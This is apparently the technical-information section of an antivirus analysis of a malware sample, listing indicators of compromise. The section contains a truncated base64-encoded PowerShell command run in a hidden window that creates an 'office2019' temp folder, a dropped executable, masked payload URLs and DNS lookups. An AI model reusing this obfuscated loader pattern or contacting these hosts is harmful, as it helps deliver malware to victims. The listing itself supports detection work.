Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABYAGYANwBzAGYAcQA5AD0AKAAnAEMAZwAzADIAJwArACcAYgBiAG8AJwApADsAJgAoACcAbgBlAHcALQBpAHQAJwArACcAZQBtACcAKQAgACQAZQBuAFYAOgBUAGUATQBwAFwATwBGAEYASQBDAEUAMgAwADEAOQAgAC0AaQB0AGUAbQB0AHkAcABlAC...
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\metadata\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\content\f0accf77cdcbff39f6191887f6d2d357
- %TEMP%\office2019\i7hodtb3.exe
- %TEMP%\office2019\i7hodtb3.exe
- http://fh###ars.com/xxki_5q3t_2pc87c/
- http://fe###ngs504.com/cgi-bin/d_v_1ihokz5od7/
- http://fe###ngs504.com/cgi-sys/suspendedpage.cgi
- http://www.as###dektor.com/cgi-bin/g_d_0f1ay2k3t/
- http://co###ompany.com/rs-plugin/4z0_0wb_4fh9tux1/
- DNS ASK fe#####citytours.com
- DNS ASK fh###ars.com
- DNS ASK fe###ngs504.com
- DNS ASK as###dektor.com
- DNS ASK co###ompany.com
- DNS ASK gu######ge.dothome.co.kr
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABYAGYANwBzAGYAcQA5AD0AKAAnAEMAZwAzADIAJwArACcAYgBiAG8AJwApADsAJgAoACcAbgBlAHcALQBpAHQAJwArACcAZQBtACcAKQAgACQAZQBuAFYAOgBUAGUATQBwAFwATwBGAEYASQBDAEUAMgAwADEAOQAgAC0AaQB0AGUAbQB0AHkAcABlAC...' (со скрытым окном)